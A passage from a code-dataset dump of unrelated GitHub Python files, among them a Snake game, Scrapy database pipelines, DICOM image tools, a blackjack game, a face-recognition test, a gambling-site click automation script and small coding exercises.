red)\r\n name_screen.blit(player_name_2, (80, 30))\r\n pygame.display.update()\r\n pygame.time.wait(500)\r\n else:\r\n player_name = text.capitalize()\r\n done = True\r\n game.gameloop()\r\n text = ''\r\n elif event.key == pygame.K_BACKSPACE:\r\n text = text[:-1]\r\n else:\r\n text += event.unicode\r\n\r\n name_screen.blit(rules_back_ground, (0, 0))\r\n text_surface = main_font.render(text, False, color)\r\n width = max(200, text_surface.get_width() + 10)\r\n input_box.w = width\r\n name_screen.blit(text_surface, (input_box.x + 5, input_box.y - 8))\r\n pygame.draw.rect(name_screen, color, input_box, 2)\r\n player_name = main_font.render(\"Please Enter Your Name:\", False, black)\r\n name_screen.blit(player_name, (80, 30))\r\n submit_name = name_font.render(\"Press Enter To Start Playing\", False, black)\r\n name_screen.blit(submit_name, (110, 160))\r\n rules = main_font.render(\"Rules:\", False, black)\r\n name_screen.blit(rules, (60, 210))\r\n pygame.display.update()\r\n\r\n\r\n# data frame:\r\ndef score_board():\r\n try:\r\n with open(\"Score_Board.csv\", 'a') as s_b_csv:\r\n s_b_csv.write(player_name + ',' + str(game.score_count) + '\\n')\r\n except:\r\n print(\"File not Found\")\r\n\r\ndef score_board_df():\r\n global high_score\r\n df = pd.read_csv(\"Score_Board.csv\", delimiter=',')\r\n score_board_sorted = df.sort_values(\"Score\", ascending=False).drop_duplicates()\r\n high_score = score_board_sorted.head(3)\r\n\r\n\r\n# init\r\npygame.init()\r\n\r\n# classes objects\r\ngame = Game()\r\nsnake = Player()\r\nfood = Food()\r\ntail = Tail()\r\n\r\n# variables\r\nplayer_name = \"\"\r\nhigh_score = []\r\n\r\n# screen\r\nscreen_size_x = 500\r\nscreen_size_y = 500\r\n\r\n# colors\r\nsnake_head_color = (93, 116, 4)\r\nsnake_body_color = (215, 138, 75)\r\nwhite = (255, 255, 255)\r\nlight_red = (255, 0, 0)\r\nred = (200, 0, 0)\r\nlight_green = (0, 255, 0)\r\ngreen = (150, 208, 47)\r\nblack = (0, 0, 0)\r\nlight_grey = (220, 220, 220)\r\ngrey = (200, 200, 200)\r\nlight_blue = (0, 0, 255)\r\nblue = (149, 202, 255)\r\n\r\n# fonts\r\nfont_name = pygame.font.SysFont(\"Comic Sans MS\", 85)\r\nfont_over = pygame.font.SysFont(\"Comic Sans MS\", 65)\r\nscore_font = pygame.font.SysFont(\"Comic Sans MS\", 50)\r\nmain_font = pygame.font.SysFont(\"Comic Sans MS\", 30)\r\nname_font = pygame.font.SysFont(\"Comic Sans MS\", 20)\r\nsmall_font = pygame.font.SysFont(\"Comic Sans MS\", 18)\r\n\r\n# game screen\r\nscreen = pygame.display.set_mode((screen_size_x, screen_size_y))\r\npygame.display.set_caption(\"Snake\")\r\nover_screen = pygame.display.set_mode((screen_size_x, screen_size_y))\r\npygame.display.set_caption(\"Snake\")\r\n\r\n# pictures\r\nicon = pygame.image.load(\"pictures\\\\snake_icon.png\")\r\npygame.display.set_icon(icon)\r\nback_ground_menu = pygame.image.load(\"pictures\\\\snake_bg_menu.png\")\r\nback_ground_end = pygame.image.load(\"pictures\\\\snake_bg_end.png\")\r\nback_ground_game = pygame.image.load(\"pictures\\\\grass_bg.png\")\r\nrules_back_ground = pygame.image.load(\"pictures\\\\rules_bg.png\")\r\nscore_board_back_ground = pygame.image.load(\"pictures\\\\score_board_bg.png\")\r\n\r\n# play\r\ngame.menu()\r\n","repo_name":"amitsabban/First-Project_Snake-Game","sub_path":"snake_game/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":15295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12033046714","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'PuntoVenta.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^', include('Apps.Ventas.urls', namespace='Venta')),\n url(r'^', include('Apps.Producto.urls', namespace='Producto')),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"Ezla/Venta","sub_path":"PuntoVenta/PuntoVenta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11216572600","text":"class Solution(object):\n def minSubArrayLen(self, s, nums):\n \"\"\"\n :type s: int\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # 7 star, 没能掌握,必须熟练掌握\n # 双指针,滑动窗口法\n # 双指针法,右指针不断往右遍历,如果左指针和右指针构成的子数组的和大于等于s了,左指针也开始往右遍历,意图寻找\n # 以右指针结尾且和大于等于s的子数组的最小长度,找到当前的最小长度左指针往前移动一步,右指针也继续往前直到和左指针构成的数组的和再次大于等于s,\n # 这时左指针又可以往前了,直到找到当前右指针为结尾的最小长度的子数组,一直这样重复,直到右指针到达数组的最右边\n if sum(nums) < s:\n return 0\n _min = 0xffffffff\n left, right = 0, 1\n cur = nums[0]\n while right < len(nums):\n while cur < s and right < len(nums):\n cur += nums[right]\n right += 1\n\n while cur >= s and left < right:\n cur -= nums[left]\n left += 1\n _min = min(_min, right - left + 1)\n return _min\n\n\nprint(Solution().minSubArrayLen(7, [2,3,1,2,4,3]))\n\n# 一开始自己做的,超时了\n# class Solution:\n# def minSubArrayLen(self, s, nums):\n# \"\"\"\n# :type s: int\n# :type nums: List[int]\n# :rtype: int\n# \"\"\"\n# _min = 0xffffffff\n# if sum(nums) < s:\n# return 0\n# length = len(nums)\n# for i in range(length):\n# for j in range(i + 1, length + 1):\n# cur_sum = sum(nums[i:j])\n# if cur_sum >= s:\n# _min = min(_min, j - i)\n# break\n# return _min\n","repo_name":"goalong/lc","sub_path":"v2/209.py","file_name":"209.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"41782052680","text":"import pandas as pd\nimport login_data\n\ndef getURLsPD(subreddit, time=\"week\", reddit_read_only=login_data.reddit_read_only , limit=10) -> pd.DataFrame:\n output = pd.DataFrame()\n \n subreddit = reddit_read_only.subreddit(subreddit)\n posts = subreddit.top(time, limit=limit)\n posts_dict = {\"Title\": [], \"Post Text\": [],\n \"ID\": [], \"Score\": [],\n \"Total Comments\": [], \"Post URL\": []\n }\n for post in posts:\n posts_dict[\"Title\"].append(post.title)\n posts_dict[\"Post Text\"].append(post.selftext)\n posts_dict[\"ID\"].append(post.id) \n posts_dict[\"Score\"].append(post.score)\n posts_dict[\"Total Comments\"].append(post.num_comments)\n posts_dict[\"Post URL\"].append(post.url)\n top_posts = pd.DataFrame(posts_dict)\n output=pd.concat([output, top_posts], ignore_index=True)\n \n return output\n\n\n#top_posts=getURLsPD(\"Eyebleach\")\n\n#print(top_posts)\n\n","repo_name":"andrismrnvszki/redditApiThingy","sub_path":"gatherURLs.py","file_name":"gatherURLs.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5166757289","text":"# -*- coding: utf-8 -*-\n#\n# Test\n# Author: alex\n# Created Time: 2018年12月09日 星期日 20时25分48秒\nimport os\nimport cv2\nimport time\nimport face_lib\n\n\ndef path_detect(path, model_algo):\n filenames = sorted(os.listdir(path))\n files = []\n # face detection\n start = time.time()\n count = 0\n print('face detection...')\n for fn in filenames:\n if fn.endswith(('jpg', 'jpeg', 'png')) is False:\n continue\n count += 1\n image = cv2.imread(os.path.join(path, fn))\n locations, confidences = face_lib.detect(image, model=model_algo)\n if len(locations) > 0:\n encodings = face_lib.encode(image, locations)\n files.append((fn, locations, encodings,\n max(confidences), confidences))\n print(fn, locations, confidences)\n\n print('===> ', time.time()-start, ' image count: ', count)\n\n # 判断前后图片的人脸距离\n compare_before_face(files)\n return\n\n # face recognition\n print('face recognition...')\n faces = []\n faces_files = []\n\n # find the best image\n score = 0\n for fn, locations, encodings, _, confidences in files:\n tmp_score = sum(confidences)\n if tmp_score > score:\n score = tmp_score\n faces = encodings\n annotate = ['Face'+chr(ord('A')+i) for i in range(len(faces))]\n faces_files = [(fn, locations, annotate)]\n\n print('The best face: ', faces_files[0][0])\n faces = [[f] for f in faces]\n\n # files = sorted(files, key=lambda x: x[3], reverse=True)\n new_confidence = 0.7 if model_algo == 'dnn' else 1\n for fn, locations, encodings, _, confidences in files:\n if len(faces) == 0:\n faces = encodings\n annotate = ['Face'+chr(ord('A')+i) for i in range(len(faces))]\n faces_files = [(fn, locations, annotate)]\n continue\n\n has_new_face = False\n annotate = []\n for encoding, confidence in zip(encodings, confidences):\n distance, face_index = cal_distinces(faces, encoding)\n print(fn, face_index, distance)\n if distance < 0.50: # 不是新face\n if distance > 0.40:\n faces[face_index].append(encoding)\n annotate.append('Face'+chr(ord('A')+face_index))\n continue\n if confidence < new_confidence:\n continue\n print('new face in ', fn, ' distance: ', distance)\n has_new_face = True\n annotate.append('Face'+chr(ord('A')+len(faces)))\n faces.append([encoding])\n\n if has_new_face:\n faces_files.append((fn, locations, annotate))\n\n # show images\n print('show images...')\n print('total face image count:', len(faces_files))\n print('new face count: ', len(faces))\n for fn, locations, annotate in faces_files:\n print(fn, locations)\n image = cv2.imread(os.path.join(path, fn))\n show_image(image, locations, annotate)\n\n\ndef cal_distinces(faces, face):\n distances = []\n for group in faces:\n tmp_distances = face_lib.distance(group, face)\n distance = min(tmp_distances)\n distances.append(distance)\n\n min_distance = min(distances)\n return min_distance, distances.index(min_distance)\n\n\ndef compare_before_face(files):\n print('判断前后图片的人脸距离')\n before_faces = files[0][2]\n before_locs = files[0][1]\n for fn, locations, encodings, _, confidences in files:\n has_new_face = False\n for face, loc in zip(encodings, locations):\n distances = face_lib.distance(before_faces, face)\n min_distance = min(distances)\n index = distances.tolist().index(min_distance)\n loc_dis = sum([abs(p1[0]-p2[0]) + abs(p1[1]-p2[1])\n for p1, p2 in zip(loc, before_locs[index])])\n print('--> ', index, min_distance, loc_dis)\n if min_distance > 0.5:\n print('new face: ', min_distance, index)\n has_new_face = True\n\n print(fn, locations, confidences)\n before_locs = locations\n before_faces = encodings\n\n\ndef show_image(image, locations, annotate, wait=0):\n for ((left, top), (right, bottom)), anno in zip(locations, annotate):\n cv2.rectangle(image, (left, top),\n (right, bottom), (0, 255, 0))\n labelSize, baseLine = cv2.getTextSize(anno, cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, 1)\n\n cv2.rectangle(image, (left, top - labelSize[1]),\n (left + labelSize[0], top + baseLine),\n (255, 255, 255), cv2.FILLED)\n cv2.putText(image, anno, (left, top),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))\n\n cv2.imshow(\"detect\", image)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n import sys\n path_detect(sys.argv[2], sys.argv[1])\n","repo_name":"cyy0523xc/face_lib","sub_path":"tests/face_test.py","file_name":"face_test.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5251102109","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport MySQLdb\nimport MySQLdb.cursors\nfrom datetime import date\nfrom twisted.enterprise import adbapi\nfrom scrapy import log\nfrom scrapy.pipelines.files import FilesPipeline\nfrom scrapy import Request\nfrom Crawler.items import SSEPostItem\n\n\nclass PostPipeline(object):\n def __init__(self):\n self.dbpool = adbapi.ConnectionPool('MySQLdb',\n host='127.0.0.1',\n db='post',\n user='root',\n passwd='passw0rd',\n cursorclass=MySQLdb.cursors.DictCursor,\n charset='utf8',\n use_unicode=True\n )\n\n\nclass GubaPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"GubaSpider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into guba (stock_id, url, title, username, content, created_time, updated_time, '\n ' read_count, comment_count)'\n + 'values (%s, %s, %s, %s, %s, %s, %s,'\n ' %s, %s)',\n (item['stock_id'],\n item['url'],\n ''.join(item['title']),\n ''.join(item['username']),\n ''.join(item['content']),\n item['created_time'],\n item['updated_time'],\n item['read_count'],\n item['comment_count'],\n #item['thumbup_count'],\n # item['forward_count'][0],\n # item['share_count'][0],\n # item['favourite_count'][0]\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n\nclass XueqiuPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"XueqiuSpider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into xueqiu (stock_id, title, username, content, created_time,'\n ' comment_count, donate_count, forward_count, favourite_count)'\n + 'values (%s, %s, %s, %s, %s,'\n ' %s, %s, %s, %s)',\n (item['stock_id'],\n item['title'],\n item['username'],\n item['content'],\n item['created_time'],\n # item['updated_time'],\n item['comment_count'],\n item['donate_count'],\n item['forward_count'],\n item['favourite_count']\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n\nclass SSEPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"SSESpider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into sse (stock_id, url, title, created_time)'\n + 'values (%s, %s, %s, %s)',\n (item['stock_id'],\n item['url'],\n item['title'],\n item['created_time']\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n\nclass SSEPdfPipeline(FilesPipeline):\n def get_media_requests(self, item, info):\n if isinstance(item, SSEPostItem):\n for file in item['file_urls']:\n yield Request(url=file['file_url'], meta={'file': file})\n\n def file_path(self, request, response=None, info=None):\n # return request.meta['file']['file_name']\n return date.today().strftime('%Y%m%d') + '/' + request.meta['file']['file_name']\n\n\nclass SSEAnnouncementPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"SSE_Announcement_Spider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into sse_announcement (stock_id, url, title, content, created_time)'\n + 'values (%s, %s, %s, %s, %s)',\n (item['stock_id'],\n item['url'],\n item['title'],\n ''.join(item['content']),\n item['created_time'],\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n","repo_name":"smilezjw/Guba_Xueqiu_Crawler","sub_path":"Crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11982230059","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"options.py: Geniac CMake option class\"\"\"\n\nimport logging\nimport re\nimport shutil\nimport os\nfrom pathlib import Path\n\nfrom geniac.cli.commands.init import GeniacInit\n\n__author__ = \"Fabrice Allain\"\n__copyright__ = \"Institut Curie 2020\"\n\n_logger = logging.getLogger(__name__)\n\n\nclass GeniacClean(GeniacInit):\n \"\"\"Geniac CMake Recipes class\"\"\"\n\n def __init__(\n self,\n *args,\n src_path: str = None,\n **kwargs,\n ):\n \"\"\"Init flags specific to GRecipes command\"\"\"\n super().__init__(\n *args, src_path=src_path, post_clean=True, init_build=False, **kwargs\n )\n\n def clean_build(self):\n \"\"\"Clean build directory\"\"\"\n\n build_dir = self.working_dirs[\"build\"].as_posix()\n if os.path.isdir(build_dir):\n shutil.rmtree(build_dir)\n os.mkdir(build_dir)\n self.info(\"The folder '%s' has been cleaned.\", build_dir)\n\n def run(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n self.clean_build()\n","repo_name":"bioinfo-pf-curie/geniac","sub_path":"src/geniac/cli/commands/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"9527217568","text":"# When provided with a String, capitalize all vowels\n\n# For example:\n\n# Input : \"Hello World!\"\n\n# Output : \"HEllO WOrld!\"\n\n# Note: Y is not a vowel in this kata.\n\ndef swap(str):\n vowels = ['a', 'e', 'i', 'o', 'u']\n result = ''\n for x in str:\n if x.lower() in vowels:\n result += x.upper()\n else:\n result += x\n return result\n\n# print (swap(\"HelloWorld!\"), \"HEllOWOrld!\")","repo_name":"k-henningson/Coding-Challenges","sub_path":"OOP/changing_letters/changing_letters.py","file_name":"changing_letters.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585262601","text":"import math\n\nT = int(input())\n\nfor i in range(T):\n\tN, K = [int(i) for i in input().split()]\n\n\tpankakes = []\n\n\tmaxR = 0\n\n\tfor j in range(N):\n\t\tri, hi = [int(i) for i in input().split()]\n\t\tif ri > maxR:\n\t\t\tmaxR = ri\n\t\tpankakes.append((ri, hi))\n\n\tpankakes.sort(key=lambda p:p[0], reverse=True)\n\n\tbest_result = 0\n\n\n\tfor p in range(1+N-K):\n\t\tresult = math.pi*(pankakes[p][0]**2) + 2 * math.pi * pankakes[p][0] * pankakes[p][1]\n\t\tcopy = list(pankakes)\n\t\tcopy = copy[p+1:]\n\t\tcopy.sort(key=lambda p: p[0]*p[1], reverse=True)\n\n\t\tfor o in range(K-1):\n\t\t\tresult += 2 * math.pi * copy[o][0] * copy[o][1]\n\t\t\t\n\t\tif result > best_result:\n\t\t\tbest_result = result\n\n\tprint(\"Case #{}: \".format(i+1)+str(best_result))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/131.py","file_name":"131.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2038026230","text":"import os\nimport socket\n\nimport numpy\nfrom PIL import Image, ImageQt, ImageEnhance\nfrom PySide6.QtGui import QImage, QPixmap\nfrom pydicom import Dataset\nfrom pydicom import dcmread\nfrom pydicom.charset import python_encoding\n\nfrom datetime import datetime\n\n\ndef _get_lut_value(data, window, level):\n \"\"\"\n Apply the RGB Look-Up Table for the given\n data and window/level value.\n Magic code from pydicom example. Do not touch!\n \"\"\"\n return numpy.piecewise(data,\n [data <= (level - 0.5 - (window - 1) / 2),\n data > (level - 0.5 + (window - 1) / 2)],\n [0, 255, lambda data: ((data - (level - 0.5)) /\n (window - 1) + 0.5) * (255 - 0)])\n\n\ndef _get_pil_image(dataset: Dataset) -> Image:\n \"\"\"\n Get Image object from Python Imaging Library(PIL)\n Magic code from pydicom example. Do not touch!\n \"\"\"\n if 'PixelData' not in dataset:\n raise TypeError(\"Cannot show image -- DICOM dataset does not have \"\n \"pixel data\")\n # can only apply LUT if these window info exists\n if ('WindowWidth' not in dataset) or ('WindowCenter' not in dataset):\n bits = dataset.BitsAllocated\n samples = dataset.SamplesPerPixel\n if bits == 8 and samples == 1:\n mode = \"L\"\n elif bits == 8 and samples == 3:\n mode = \"RGB\"\n elif bits == 16:\n # not sure about this -- PIL source says is 'experimental'\n # and no documentation. Also, should bytes swap depending\n # on endian of file and system??\n mode = \"I;16\"\n else:\n raise TypeError(\"Don't know PIL mode for %d BitsAllocated \"\n \"and %d SamplesPerPixel\" % (bits, samples))\n\n # PIL size = (width, height)\n size = (dataset.Columns, dataset.Rows)\n\n # Recommended to specify all details\n # by http://www.pythonware.com/library/pil/handbook/image.htm\n image = Image.frombuffer(mode, size, dataset.PixelData,\n \"raw\", mode, 0, 1)\n\n else:\n ew = dataset['WindowWidth']\n ec = dataset['WindowCenter']\n # noinspection PyUnresolvedReferences\n ww = int(ew.value[0] if ew.VM > 1 else ew.value)\n # noinspection PyUnresolvedReferences\n wc = int(ec.value[0] if ec.VM > 1 else ec.value)\n image = _get_lut_value(dataset.pixel_array, ww, wc)\n # Convert mode to L since LUT has only 256 values:\n # http://www.pythonware.com/library/pil/handbook/image.htm\n # im = PIL.Image.fromarray(image).convert('L') # Grey (from manual)\n image = Image.fromarray(image).convert('RGB') # color\n\n return image\n\n\ndef get_pixmap_from(dataset: Dataset) -> QPixmap:\n \"\"\" Return QT5 QPixmap from DICOM dataset\"\"\"\n image = _get_pil_image(dataset)\n # image = _process(image)\n data = image.tobytes(\"raw\", \"RGB\")\n qim = QImage(data, image.size[0], image.size[1], QImage.Format_RGB888)\n return QPixmap(qim)\n\n\ndef tune(pil_img: ImageQt, brightness, contrast, sharpness) -> QPixmap:\n sh = float(sharpness) / 100\n br = float(brightness) / 100\n co = float(contrast) / 100\n tmp_img = ImageEnhance.Sharpness(pil_img).enhance(sh)\n tmp_img = ImageEnhance.Brightness(tmp_img).enhance(br)\n tmp_img = ImageEnhance.Contrast(tmp_img).enhance(co)\n return ImageQt.toqpixmap(tmp_img)\n\n\ndef tune_qpixmap(pixmap: QPixmap, brightness, contrast, sharpness) -> QPixmap:\n return tune(ImageQt.fromqpixmap(pixmap), brightness, contrast, sharpness)\n\n\ndef try_port(port: int) -> bool:\n \"\"\" Return True if *port* free \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = False\n try:\n sock.bind((\"0.0.0.0\", port))\n result = True\n except Exception as e:\n log_to_file('Port {} is busy.'.format(port))\n log_to_file(e)\n finally:\n sock.close()\n return result\n\n\ndef decode_rus(s: str, dataset: Dataset) -> str:\n # исправляем кодировку на русскую\n result = bytes(s, python_encoding[str(dataset.SpecificCharacterSet)]) \\\n .decode(python_encoding['ISO_IR 144']) # for Russian\n # если строка повторяется, то берем половину\n left = result[:len(result) // 2]\n right = result[len(result) // 2:len(result)]\n if left == right:\n result = left\n return result\n\n\ndef log_to_file(message: str):\n log_path = './errors.log'\n with open(log_path, \"a\" if os.path.isfile(log_path) else \"w\") as log_file:\n log_file.write('{}: {}\\n'.format(datetime.now(), message))\n\n\nif __name__ == '__main__':\n im = _get_pil_image(dcmread('../test_scu/dcm/27.dcm'))\n im.save('./27.jpg')\n","repo_name":"tripsin/sonoprint","sub_path":"sonoprint/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29713972866","text":"import random\nimport time\nimport sys\nfrom art import logo\ndef s_player_cards():\n \"\"\"Sum of player's cards\"\"\"\n sum_p_cards = 0\n return sum(p_cards)\ndef s_dealer_cards():\n \"\"\"Sum of dealer's cards\"\"\"\n sum_d_cards = 0\n return sum(d_cards)\ndef check_final_score(s_p_cards, s_d_cards):\n \"\"\"Checking the score, needs update\"\"\"\n if s_dealer_cards() > s_player_cards():\n return \"You lost\"\n elif s_player_cards() > s_dealer_cards():\n return \"You win\"\n else:\n return \"It's a tie! You're lucky this time\"\ndef check_player_score(s_player_cards):\n if s_player_cards() > 21:\n return \"You went over 21. You lost!\"\n else:\n return s_player_cards()\ndef ace(s_player,p_cards): \n \"\"\"Function to verify when an ace is 11 or 1\"\"\"\n if s_player_cards() > 21:\n for i in range(0,len(p_cards)):\n if p_cards[i] == 11:\n if s_player_cards() - 10 > 21:\n return \"You lost!\"\n else:\n return 0\ndef dealer_cards():\n while sum(d_cards) < 17:\n d_cards.append(random.choice(cards))\n if sum(d_cards) > 17:\n return d_cards\ndef blackjack(sum_dealer,sum_player):\n if sum_player == 21:\n return \"It's a blackjack. You win\"\n elif sum_dealer == 21:\n return \"I'm sorry. Blackjack to dealer. You lose!\"\n else:\n return 0\ncards = [11,2,3,4,5,6,7,8,9,10,10,10,10]\nprint(logo)\nwanna_play = input(\"Do you want to play a blackjack game? Type 'y' or 'n' \").strip()\nwanna_play = wanna_play.lower()\np_cards = random.sample(cards,2)\nd_cards = random.sample(cards,2)\nprint(f\"Your cards are {p_cards} , total = {s_player_cards()}\")\nprint(f\"Computer's first card is {d_cards[0]} \\n\")\nif blackjack(s_dealer_cards(),s_player_cards()) != 0:\n print(blackjack(s_dealer_cards,s_player_cards))\n sys.exit()\nget_card = input(\"Do you want to get another card? Type 'y' or 'n' \").strip()\nwhile True:\n if get_card == 'n':\n break\n if get_card == 'y':\n p_cards.append(random.choice(cards))\n if blackjack(s_dealer_cards,s_player_cards) != 0:\n blackjack(s_dealer_cards,s_player_cards)\n break\n if ace(s_player_cards,p_cards) == \"You lost!\":\n ace(s_player_cards,p_cards)\n print(f\"Your cards are {p_cards} , total = {s_player_cards()} \\n\")\n ace(s_player_cards,p_cards)\n if check_player_score(s_player_cards) != s_player_cards():\n dealer_cards()\n print(f\"Computer's final cards are {d_cards} , total is {s_dealer_cards()}.\")\n if check_player_score(s_player_cards) != s_player_cards():\n print(check_player_score(s_player_cards)) \n break\n if s_player_cards() < 21:\n get_card = input(\"\\nDo you want to get another card? Type 'y' or 'n' \").strip()\n else:\n break\nif get_card == 'n':\n dealer_cards()\n s_dealer_cards()\n if s_dealer_cards() > 21:\n print(f\"Your final cards are {p_cards} , total is {s_player_cards()}\")\n print(f\"Computer's final cards are {d_cards} , total is {s_dealer_cards()}.\\n\")\n print(\"You win!\")\n else:\n print(f\"Your final cards are {p_cards} , total is {s_player_cards()}\")\n print(f\"Computer's final cards are {d_cards} , total is {s_dealer_cards()}.\\n\")\n time.sleep(1)\n print(check_final_score(s_player_cards,s_dealer_cards))\n \n\n\n\n\n\n \n \n \n \n\n\n\n\n\n\n\n\n","repo_name":"biscuitdelicious/Blackjack","sub_path":"main_game.py","file_name":"main_game.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16942729936","text":"class Queue:\n def __init__(self):\n self.item=[]\n\n def is_empty(self):\n return len(self.item) == 0\n\n def enqueue(self,data):\n self.item.append(data)\n\n def dequeue(self):\n if not self.is_empty():\n return self.item.pop(0)\n else:\n raise IndexError(\"list is empty\")\n def get_front(self):\n if not self.is_empty():\n return self.item[0]\n else:\n raise IndexError(\"list is empty\")\n def get_rear(self):\n if not self.is_empty():\n return self.item[-1]\n else:\n raise IndexError(\"list is empty\")\n def size(self):\n if not self.is_empty():\n return len(self.item)\n else:\n raise IndexError(\"list is empty\")\n\nq1=Queue()\nq1.enqueue(10)\nq1.enqueue(20)\nq1.enqueue(30)\nq1.enqueue(40)\nq1.enqueue(50)\nq1.enqueue(60)\nq1.enqueue(70)\nq1.enqueue(80)\nq1.dequeue()\nq1.dequeue()\nprint(\"front item of the queue :\",q1.get_front())\nprint(\"rear item of the queue :\",q1.get_rear())\nprint(\"size of the queue :\",q1.size())\n\n\n","repo_name":"GODZ-k/python_datastructure","sub_path":"queue_1.py","file_name":"queue_1.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7087656631","text":"import pyautogui\nfrom time import sleep\n##### bet info\nbankroll = '1.59'\npayout_amount = '99' # float(input('Payout Amount : '))\nbet_amount = '0.001' # float(input('Bet Amount : '))\nloss_increase_percentage = '1.025' # int(input('Percentage Increase on Loss : '))\n\n##### game location info zoom 50% chrome\n\nclassic_dice_seed_location = 500, 517 \nclassic_dice_new_seed = 302, 602\nclassic_dice_tab = 100, 40\nclassic_dice_bet_amount_location = 153, 236\nclassic_dice_start_location = 191, 526\n\nvault_tab = 300, 40\nvault_max = 385, 268\nvault_transfer = 345, 308\nvault_out = 375, 192\nvault_in = 275, 192\nvault_amount = 256, 267\n#####\ndef vault():\n pyautogui.click(vault_tab)\n sleep(1)\n pyautogui.click(vault_in)\n sleep(1)\n pyautogui.click(vault_max)\n sleep(1)\n pyautogui.click(vault_transfer)\n sleep(1)\n pyautogui.click(vault_out)\n sleep(1)\n pyautogui.doubleClick(vault_amount, interval=0.25)\n sleep(1)\n pyautogui.write(bankroll)\n sleep(1)\n pyautogui.click(vault_transfer)\n sleep(1)\ndef classicDice():\n pyautogui.click(classic_dice_tab)\n sleep(0.25)\n pyautogui.click(classic_dice_seed_location) \n sleep(2.5)\n pyautogui.click(classic_dice_new_seed)\n sleep(2)\n pyautogui.doubleClick(classic_dice_bet_amount_location, interval=0.15)\n sleep(0.25)\n pyautogui.write(bet_amount) \n sleep(0.25)\n pyautogui.click(classic_dice_start_location)\n sleep(1)\ndef main():\n vault()\n classicDice()\n sleep(110)\nwhile True:\n main()\n","repo_name":"findingprivacy/gamblr","sub_path":"opera.py","file_name":"opera.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72676550273","text":"import math\nfrom collections import Counter\n\nfile = open(\"liczby.txt\")\nnumbers = file.read().split()\nresults = open(\"wyniki4.txt\", \"w\")\nfile.close()\n\n\ndef isPrime(n):\n if n < 2:\n return False\n else:\n for i in range(2, int(math.sqrt(n))+1):\n if n%i == 0:\n return False\n return True\n \n\n#4.1\nresults.write(\"ZADANIE 4\\n\\nZadanie 4.1\\n\")\nfor lines in numbers:\n if int(lines[::-1])%17 == 0:\n results.write(f\"{lines.strip()[::-1]}\\n\")\n\n#4.2\nmax_diff = -1000000009\nmax_diff_number = 0\nfor lines in numbers:\n lines = lines.strip()\n diff = abs(int(lines) - int(lines[::-1]))\n if diff > max_diff:\n max_diff = diff\n max_diff_number = lines\n \nresults.write(f\"\\nZadanie 4.2\\n{max_diff_number} {max_diff}\\n\\n\")\n\n#4.3\nresults.write(\"Zadanie 